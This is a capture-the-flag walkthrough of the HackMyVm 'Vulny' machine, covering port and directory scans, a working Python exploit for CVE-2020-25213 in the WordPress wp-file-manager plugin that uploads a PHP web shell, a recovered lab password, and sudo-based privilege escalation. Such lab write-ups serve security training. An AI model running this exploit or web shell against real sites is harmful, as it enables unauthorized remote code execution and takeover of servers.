Try   HackMD

Walkthrough HackMyVm - Vulny

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Here I will make a writeup of the Vulny machine on the HackMyVm platform and this is an easy rated VM, if you are interested you can click the link here. Let's start.

Reconnaissance

As always the first thing i do is port scanning. and at this point nmap only find one open TCP port that is HTTP (80):

$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds                                                     

Website

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The website display provided is only the default display, so we need to look for a hidden path or file using bruteforce directory tools such as dirb, dirsearch, etc.

Directory Bruteforce

─$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/

[04:12:21] Starting: 
[04:12:49] 200 -   11KB - /index.html                                       
[04:12:51] 301 -  317B  - /javascript  ->  http://192.168.1.38/javascript/  
[04:13:10] 301 -  313B  - /secret  ->  http://192.168.1.38/secret/          
              
Task Completed                                                                                                                             

Here we find 2 directories, namely /javascript and /secret. If we access /javascript the response given is Forbidden or not permitted. but in the /secret directory you can access it and find a note.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From this information, it is known that there is an endpoint config from WordPress which contains a password/username. but this is quite strange because if we use wappalyzer or wpscan we find no indication that the web server uses wordpress.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Next, we try to bruteforce the directory again using dirsearch specifically for the secret path.

$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/secret/

[04:32:45] Starting: 
[04:33:29] 200 -    7KB - /secret/readme.html                               
[04:33:42] 301 -  322B  - /secret/wp-admin  ->  http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 -  324B  - /secret/wp-content  ->  http://192.168.1.38/secret/wp-content/
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/akismet.php    
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/admin.php      
[04:33:42] 200 -    2KB - /secret/wp-content/                               
[04:33:42] 200 - 1003B  - /secret/wp-content/upgrade/                       
[04:33:42] 200 -    1KB - /secret/wp-content/uploads/                       
[04:33:42] 301 -  325B  - /secret/wp-includes  ->  http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 -    3KB - /secret/wp-admin/setup-config.php                 
[04:33:43] 500 -    0B  - /secret/wp-includes/rss-functions.php             
                                                                        
Task Completed                                                                   

From these results, 3 paths were found, namely;
/wp-admin = The response given is the same as /secret

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

/wp-content = Response 200

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

/wp-includes = Forbidden

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Next, we can focus on /wp-content and in it there is the /uploads directory and if we access it we find that this website uses the wp-file-manager plugin.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Web Exploitation

If we access http://192.168.1.38/secret/wp-content/uploads/2020/10/ You will find the version of wp-file-manager, namely 6.0. and this version vulnerable !

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We need to download the exploit and make small changes to the location of the url by adding /secret.

#!/usr/bin/env

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):

	exec_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
		"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
			'Connection': "close" 
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
		r=requests.post(upload_url,data=payload,headers=headers)
		#pprint(r.json())
		commandexec(command)
	except:
		print("[!] Algo ha salido mal...")

def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")


if __name__ == '__main__':

	if len(sys.argv) != 3:
		help()

	else:
		exploit()

Then run the script.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Here we managed to get the shell, next we need to get the reverse shell.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

After getting the reverse shell, we need to check the config file to find the user/password like the hint given in /secret earlier.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

idrinksomewater

A password was found, and we checked in /etc/passwd there was a user adrian. and we can assume that this password belongs to Ari Adrian.

Initial Access

Login as adrian and the password you obtained earlier. and here we have successfully entered.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We need to do is check whether the user can exercise sudo access rights or not and to display a list of permitted commands with the command sudo -l

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

There is a binary flock and we can use it to carry out privilege escalation.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

And root was successfully obtained. Vulny pwned!

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →